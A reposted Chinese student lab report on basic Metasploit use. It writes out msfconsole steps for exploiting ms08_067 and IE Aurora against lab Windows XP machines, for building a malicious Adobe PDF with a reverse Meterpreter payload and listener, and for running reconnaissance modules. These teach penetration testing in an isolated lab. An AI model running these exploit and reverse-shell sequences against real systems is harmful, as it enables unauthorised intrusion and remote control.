20155320《网络对抗》MSF基础应用

最新推荐文章于 2024-08-08 18:22:07 发布
最新推荐文章于 2024-08-08 18:22:07 发布
阅读量105 收藏
点赞数
文章标签: 网络 操作系统 运维
原文链接:http://www.cnblogs.com/ljq1997/p/8969593.html
版权

20155320《网络对抗》MSF基础应用

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode

    • 于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作
    • payload 感觉就是一段代码,通过运行这个代码可以实现漏洞攻击

    • encode,我觉得它就是一个加密工具

      实践过程

  • 使用到的虚拟机IP

虚拟机IP地址
靶机2 Vivian xp192.168.63.129
靶机3192.168.63.131
攻击机 kali2192.168.63.133

1071521-20180424111248116-434283084.png

1071521-20180425154709203-2027177103.png

1071521-20180425164346852-977265624.png

1.1一个主动攻击实践——ms08_067漏洞攻击;

这次需要用到靶机3和kali2

  • 在kali的终端中输入msfconsole进入控制台

  • 输入use exploit/windows/smb/ms08_067_netapi 使用该模块

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配

  • show playload可以查看可使用的载荷

1071521-20180425164630556-1458598863.png

  • set payload generic/shell_reverse_tcp,tcp反向回连

  • 输入如下完成配置

set LHOST 192.168.63.133 此IP是kali的IP
set LPORT 5320 端口
set RHOST 192.168.63.131 此IP是靶机WIN XP的IP,特定漏洞端口已经固定

1071521-20180425165936015-2022245185.png

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配
    ,输入set target 0

1071521-20180425165518404-1219188118.png

  • 输入exploit 进行攻击

1071521-20180425165129818-197361076.png

  • 然后成功攻击的标志是出现如下结果,成功获得了XP靶机的shellcode,输入命令ipconfig可以看到和在XP上一样的结果

1071521-20180425165236804-1671915050.png

MS10_002_aurora漏洞攻击;

  • 之前的配置和第一个主动攻击实验是一样的命令,依次输入如下即可
msfconsole
use exploit/windows/browser/ms10_002_aurora
set payload generic/shell_reverse_tcp
set LHOST 192.168.63.133 //设置kali攻击IP,
set RHOST 192.168.63.131
set SRVPORT 5320
  • 查看配置项,确认无误

1071521-20180428205647647-521603886.png

  • 输入exploit 运行,成功生成了一个URL

1071521-20180428210416677-2007381151.png

  • 在靶机上的IE里输入URL,在攻击机kali上可以看到打开了session 1,但是奇怪的是他卡住了T_T,难受

1071521-20180428211651807-1571013030.png

1071521-20180428210943900-358761750.png

  • 我只能用session -i 1打开session1,成功取得靶机shell,输入ipconfig可以得到靶机的IP

1071521-20180428211226359-1516287001.png

1071521-20180428211338968-317340007.png

针对客户端的攻击:adobe_toolbutton

这次用的是vivian-XP和kali2

  • 进入MSF,后输入search adobe找到相应模块

1071521-20180428212756026-51857302.png

  • 输入以下命令,完成配置并创建pdf,打开显示隐藏文件,并在/root/.msf4/local/目录下找到20155320.pdf文件,如下图所示
use exploit/windows/fileformat/adobe_toolbutton//使用Adobe_toolbutton模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.63.133 //设置kali攻击IP,
set LPORT 5320
set FILENAME 20155320.pdf

1071521-20180429100428531-1846675658.png

  • 将这个pdf拷到靶机上

1071521-20180429102603027-1192641470.png

  • 之后进入之前的监听模块,依次输入以下命令设置并监听即可,输入exploit后在靶机上打开pdf,回连成功(但是不知道为啥这个反应特别慢T_T)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.63.133
set LPORT 5320
exploit

1071521-20180429144257667-1060303008.png

1071521-20180429143647660-1865881909.png

  • 成功获取shellcode之后输入ipconfig,确认连上了正确的靶机

1071521-20180429144136495-2054051622.png

成功应用任何一个辅助模块:我应用了两个

其中一个是跟风弄的scanner,为了和别人不一样我还应用了一个gather的
通过参考Kali linux 2016.2(Rolling)中的auxiliary模块详解了解了如何学习使用MSF的模块

  • 输入命令show auxiliary查看所有辅助模块

    操作系统/类型/模块名称

1071521-20180429145957346-1392833823.png

1.gather/browser_info

这是一个搜集信息的模块

  • 通过命令info gather/browser_info,查看模块的配置信息

1071521-20180429164055195-1959010366.png

  • 输入use auxiliary/gather/browser_info使用这个模块,并根据要求设置相应的配置信息,目的是我要搜集Vivian-XP靶机的信息,所以将产生的URL网址在Vivian-XP的IE中打开,可以看到搜集到的信息如下:有windows系统类型,使用中文等信息,可以为攻击提供重要保障

1071521-20180429164247275-462923383.png

2.scanner/dcerpc/tcp_dcerpc_auditor

  • 我选择了模块scanner/dcerpc/tcp_dcerpc_auditor 进行试验,这是一个normal级别的,比较容易
    -输入use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor使用这个辅助模块,设置成功后,可以运行,发现成功了

1071521-20180429162916093-528795519.png

实验总结

这次的收获除了尝试了浏览器漏洞攻击、利用打开pdf攻击等有趣的攻击外,最大的收获是尝试了MSF的不同模块,发现原来使用起来都很便捷,按照要求配置好就可以应用了,同时发现MSF的功能也很多,信息搜集啥的简直不要太6了。

转载于:https://www.cnblogs.com/ljq1997/p/8969593.html

weixin_30799995
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 361
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
msf简单运用基础
12-16
文中通过ping命令验证了网络连通性,这是进行后续渗透测试的基础。 ### 二、MSF框架的初步使用 #### 1. 扫描目标系统 - **db_nmap**: 这是MSF中调用Nmap工具的一种方式,用于获取目标主机的操作系统类型、开放端口...
通信与网络中的MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。   图 MSF基于组件的业务框架   (1)应用层业务组件(ASC)   这些组件通常与应用服务器有关,通过信令访问,由一系列输入输出交互准则定义。例如,基于SIP的业务交互中,相关ASC必须理解发送或接收的不同SIP消息中特定的参数。   (2)媒体服务组件(MSC)   MSC用于与媒体通路的交互,MSC大多与媒体服务器有关,包括一些功能如文本到语音的转化、交互式语音识别系统、会议桥等。   (3)数据
20155305《网络对抗MSF基础应用
weixin_30827565的博客
04-14 169
20155305《网络对抗MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113 windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。 Kali IP地址:19...
ctf:kali2:扫描ssh端口版本尝试auxiliary/scanner/ssh/ssh_version
viviliving的专栏
12-09 2040
msf6 > search scannerMatching Modules ================ # Name Disclosure Date Rank Check Description - ----
Metasploit 插件与辅助模块
weixin_34261739的博客
10-10 393
metasploit的一些插件和辅助模块 可利用插件: load wmap装载wmap插件 wmap_targets 数据库中的对象 (-h帮助-r重载目标表-a对象-p打印目标-s id选择目标) wmap_attack 爬行和测试 wmap_crawl 爬行网站 wmap_proxy 运行中间人代理 wmap_run 自动匹配漏洞 (-h帮助-t显...
Metasploit的攻击实例讲解----辅助扫描工具
weixin_34114823的博客
05-19 871
           不多说,直接上干货!                   怎么弹出来这个呢,连续按两次tab。 msf > use auxiliary/scanner/ Display all 485 possibilities? (y or n) use auxiliary/scanner/acpp/login use auxilia...
20155218《网络对抗MSF基础应用
04-17 126
20155218《网络对抗MSF基础应用 实验过程 1、一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞; show target 查看可以攻击的目标主机类型; show payloads查看可以选择的攻击载荷,看了一下其等级全为normal,从中找到一个可用的攻击载荷 generic/shell_reverse_tcp 用op...
20155304《网络对抗MSF基础应用
05-03 195
20155304《网络对抗MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms11_050; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。 1.1主动攻击:ms08_067 使用靶机1和Kali 先...
20145327 《网络对抗MSF基础应用
dengnaxun1606的博客
04-15 127
20145327 《网络对抗MSF基础应用 主动攻击ms08_067 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版) kali ip地址:192.168.43.54 windows xp sp3 ip地址:192.168.43.56 ping通: MS08_067远程漏洞攻击实践:Shell 1.开启msfconsole. 2.输入命令search ...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
【随笔】VRRP+MSTP
weixin_41997073的博客
08-06 399
VRRP 使用选择策略从路由器组中选出一台作为主控,负责 ARP 响应和 IP 数据包转发,组中的其他路由器作为备份的角色处于待命状态。当主控空路由发生故障时,备份路由器能在几秒的时间延后升级的主路由器。一个VRRP组中只能由一台处于主控角色的路由器,可以有一个或多个备份角色的路由器。开销值越低,表示该链路的传输速度越快,路由器会优先选择这些链路进行数据传输。抢占模式的意义, 当 R1 路由器中断又恢复后,则恢复 R1 的主导地位。设计采用主备模式,将VRRP组内多个路由设备都映射为一个虚拟路由设备。
如何计算UDP校验和
ZhongUncle的博客
08-07 933
在了解 UDP 校验和的时候,发现资料很少,如果看教材的话,一定看到过下面这两张图,但是又看不懂,加上解释之后也难懂:本文先说具体怎么算的,再说一些细节,过程中顺带解释一下这两个图(第一张图是布局情况,第二张图是解释如何计算的)。
【HAProxy】haproxy七层代理
m0_64570996的博客
08-08 981
超级超级超级详细哦哦!!!!!
网络药理学:autodock tool(mgltools)实现大分子蛋白(PDB ID已知)和小分子配体的分子快速实践流程总结
最新发布
zhiaidaidai的博客
08-08 190
这里是快速实践的流程总结版(正文步骤都需要在中进行)。pocasaPDB。
如何提前预防网络威胁
dexun123的博客
08-06 728
这场攻击规模空前,据官方数据,受影响的服务器数量飙升至3800余台,波及范围广泛,尤以美、加、法、德等国的企业为重灾区。态势感知,作为一种根植于环境、动态且全局性的安全风险洞察能力,其核心在于运用安全大数据的浩瀚资源,从宏观视角深化对安全威胁的发现、理解、分析及响应能力,最终引领至精准的安全决策与行动。态势感知强调对网络安全态势的全方位、实时、动态监控与评估,旨在于攻击链条的每一个细微环节捕捉异常,无论是情报搜集的微妙动作,还是攻击尝试的初步试探,乃至数据窃取与情报回传的隐蔽行动,都难逃其敏锐的“法眼”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值